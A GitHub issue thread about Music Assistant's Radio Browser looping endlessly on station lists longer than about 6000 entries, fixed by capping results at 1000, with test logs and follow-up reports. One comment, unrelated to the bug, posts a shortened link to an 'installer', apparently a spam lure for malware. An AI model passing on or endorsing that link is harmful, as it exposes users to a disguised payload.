### ISSUE TITLE
Browser failing to load large station lists in Radio Browser (may affect all large lists?)

### ISSUE THREAD

**Issue by gmn42** [music-assistant/hass-music-assistant#2862]
### What version of Music Assistant has the issue?

2.3.0b17

### What version of the Home Assistant Integration have you got installed?

2024.8.1

### Have you tried everything in the Troubleshooting FAQ and reviewed the Open and Closed Issues and Discussions to resolve this yourself?

- [X] Yes

### The problem

When attempting to view a large list of radio stations in the Browse view, the web browser will repeatedly re-load a blank screen and never display the list.  This occurs with the US (6448 entries) or German (5178) "By country" lists, but the next-largest "Russia" list with 2178 entries does load correctly.  The "By popularity" and "By Tag" list exhibits the same error behavior, although I have no idea how many entries are in these lists.  This occurs in both Chrome and Firefox desktop browsers, and also the Home Assistant mobile app on Android.  Recovering requires pressing "Back" more quickly than the list reloads.  The browser debug console shows continuous "connection opened, connection closed, retry" messages, below:
![Screenshot from 2024-09-02 15-58-19](https://github.com/user-attachments/assets/889344dd-667e-47a9-8646-b9cfe4940f10)

Screencast showing the error, then recovery by rapidly clicking "Back":

https://github.com/user-attachments/assets/4d86165c-2076-4d6b-89aa-03d3826b907d

### How to reproduce

Attempt to view a large (>6000) list of stations under "RadioBrowser" in the "Browse" tab, such as the US or DE lists.   Clearing the MA cache does not help.

### Music Providers

RadioBrowser

### Player Providers

N/A - Never get as far as attempting to play.

### Full log output

Attached, but does not appear to contain any information relevant to this issue.
[music-assistant.log](https://github.com/user-attachments/files/16841841/music-assistant.log)

### Additional information

The problem may exist with large lists outside of RadioBrowser, but I am unable to test as I don't have a large local media collection.
Home Assistant OS is running on a Proxmox VM with 12GB of ram allocated.

### What version of Home Assistant Core are your running

2024.8.3

### What type of installation are you running?

Home Assistant OS

### On what type of hardware are you running?

Linux

**Comment by maher-nakesh** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by OzGav** [comment]
OK somehow this has regressed https://github.com/music-assistant/hass-music-assistant/issues/1425

**Comment by marcelveldt** [comment]
This is a limitation of the HA ingress implementation where the listing returned by radiobrowser exceeds a treshold.
I'll cap the results at 1000 items as browsing such a listing makes no sense anyways - better use the search instead.

**Comment by marcelveldt** [comment]
please test if this is fixed in 2.3.0b18

**Comment by gmn42** [comment]
What's the best way to test this?  The latest beta pushed to the add-on store still seems to be 2.3.0b17.  I tried using the dev version and had it pull from Github branch 2.3.0b18... will that get me the right version?  It's indicating a 0.0.0 during startup and on the core config screen (see below).

In any case, it seems to be right because it loads the US and DE country lists without the loop now, and also works with "By Popularity" list, but I still get the loading loop still if I select "By Tag".

From a UI standpoint, you probably should indicate to the user if only a partial list can be loaded, or just refuse to load it at all - an incomplete list without warning might lead to user confusion and frustration if a station they know should be in the list doesn't appear, especially if they know it should alpha-sort near the top.  A message like "Sorry, this list is too long. [TRY GLOBAL SEARCH]" with the appropriate link might be preferable and avoid this ambiguity.

```
Installing latest version from 2.3.0b18...
Resolved 12 packages in 57.76s
Prepared 1 package in 4.83s
Uninstalled 1 package in 24ms
Installed 1 package in 11ms
 - music-assistant==2.3.0b17
 + music-assistant==0.0.0 (from git+https://github.com/music-assistant/server.git@91399605879c0df23b4926de8b679295f823a376)
2024-09-03 13:13:36.075 DEBUG (MainThread) [music_assistant.server.controllers.config] Loaded persistent settings from /data/settings.json
2024-09-03 13:13:36.078 DEBUG (MainThread) [music_assistant.server.controllers.config] Started.
2024-09-03 13:13:36.078 INFO (MainThread) [music_assistant] Starting Music Assistant Server (9f00c09c857d4267a78654a2afdfd0bd) version 0.0.0 - HA add-on: True - Safe mode: False
2024-09-03 13:13:36.090 INFO (MainThread) [music_assistant.cache] Initializing cache controller...
```

**Comment by marcelveldt** [comment]
You just wait until 2.3.0b18 is available, a bit patience maybe ?

**Comment by marcelveldt** [comment]
ah you tested using the dev version.. yeah that works...
I'll add the limit to the "by tag" section as well.

Don't worry about the UI standpoint, the resulting list is sorted by popularity. I think HA is even only getting the top 250 or so and nobody complains.

**Comment by OzGav** [comment]
confirmed fixed in beta 19

**Comment by fleepcom** [comment]
I also have the same issue with v2.4.3. Country and Popularity are working fine in Music Assistant Radio Browser but when I select TAG it goes into the endless loop as described above.

If I select  Radio / TAG via the Builtin Home Assistant Media Add On it comes up with the listing without any issue.

**Comment by OzGav** [comment]
@fleepcom Please open a new issue for this
